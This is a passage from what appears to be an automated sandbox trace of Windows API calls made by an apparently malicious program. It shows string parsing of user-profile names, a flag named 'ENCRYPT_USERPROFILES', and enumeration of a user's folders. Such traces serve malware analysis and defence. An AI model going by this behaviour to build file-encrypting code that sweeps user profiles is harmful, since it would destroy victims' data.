lpString1="ultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" User", cchCount1=1, lpString2="*", cchCount2=1) returned 1 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0028.935] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.935] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.935] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aea14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea14) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0028.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\r\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\nC:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="All Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ll Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\r\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\nC:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Public", cchCount1=1, lpString2="|", cchCount2=1) returned 2 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Public", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ublic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="blic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="|", cchCount2=1) returned 3 [0028.938] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.938] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.938] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.938] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.938] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.938] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aef44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aef44) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0028.939] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0028.939] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0028.939] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2="|", cchCount2=1) returned 1 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="*", cchCount1=1, lpString2="*", cchCount2=1) returned 2 [0028.939] PeekMessageW (in: lpMsg=0x6aecec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aecec) returned 0 [0028.939] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x6ae4e0 | out: lpFindFileData=0x6ae4e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7c12c0, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2080 [0028.940] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4e0 | out: lpFindFileData=0x6ae4e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7c12c0, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.940] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4e0 | out: lpFindFileData=0x6ae4e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7c12c0, dwReserved1=0x777648, cFileName="AppData", cAlternateFileName="")) returned 1 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0028.940] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, 